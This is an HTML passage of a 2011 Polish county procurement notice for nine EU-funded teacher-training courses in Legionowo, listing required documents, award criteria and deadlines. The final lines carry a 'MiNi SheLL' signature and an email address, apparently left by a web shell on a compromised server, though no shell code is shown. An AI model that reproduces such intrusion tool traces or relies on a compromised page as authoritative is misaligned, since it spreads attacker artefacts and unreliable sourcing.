<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zaakceptowany (parafowany) wzór umowy przez Wykonawcę,
oświadczenia o spełnianiu warunków art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - doświadczenie - 30</li>
<li>3 - zastępowalność kluczowego personelu - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany istotnych postanowień zawartej umowy w następujących przypadkach:
1) gdy zmiany są korzystne dla Zamawiającego lub neutralne dla Stron umowy,
2) gdy konieczność zmiany umowy jest spowodowana okolicznościami, których Strony nie mogły przewidzieć w chwili zawierania umowy, a jednocześnie za wystąpienie tych okoliczności nie ponosi odpowiedzialności Wykonawca,
3) w razie zmiany wysokości stawki VAT Strony dokonują zmiany uwzględniającej nową wysokość tej stawki,
4) zgodnie z art. 145 ustawy - w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. W takim wypadku Wykonawca może zażądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-legionowski.pl  zakładka przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego w sekretariacie na IV piętrze, pokój nr 419 w cenie 20,00 PLN po uprzednim uzgodnieniu tel. 22/784 08 72.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2011 godzina 11:00, miejsce: Kancelaria na parterze Starostwa Powiatowego w Legionowie ul. gen. Władysława Sikorskiego 11, 05-119 Legionowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Świadomy nauczyciel, czyli nowoczesna kadra oświatowa w szkołach powiatu legionowskiego, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, działanie 9.4, współfinansowanego ze środków  Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> oferta częściowa nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fundusze zewnętrzne dla edukacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> oferta częściowa nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zasady przygotowywania wniosków aplikacyjnych do zewnętrznych źródeł finansowania, w tym do Programu Operacyjnego Kapitał Ludzki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> oferta częściowa nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pierwsza pomoc w nagłych wypadkach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> oferta częściowa nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs kierowników wycieczek szkolnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> oferta częściowa nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Profilaktyka uzależnień i zachowań destrukcyjnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> oferta częściowa nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie uczniów do egzaminu zawodowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> oferta częściowa nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak zbudować program naprawczy w zakresie podniesienia efektywności kształcenia zawodowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> oferta częściowa nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Praktyczne i problemowe metody nauczania przedmiotów zawodowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> oferta częściowa nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analiza i interpretacja wyników sprawdzianu/egzaminów zewnętrznych oraz ich wykorzystanie do poprawy jakości kształcenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com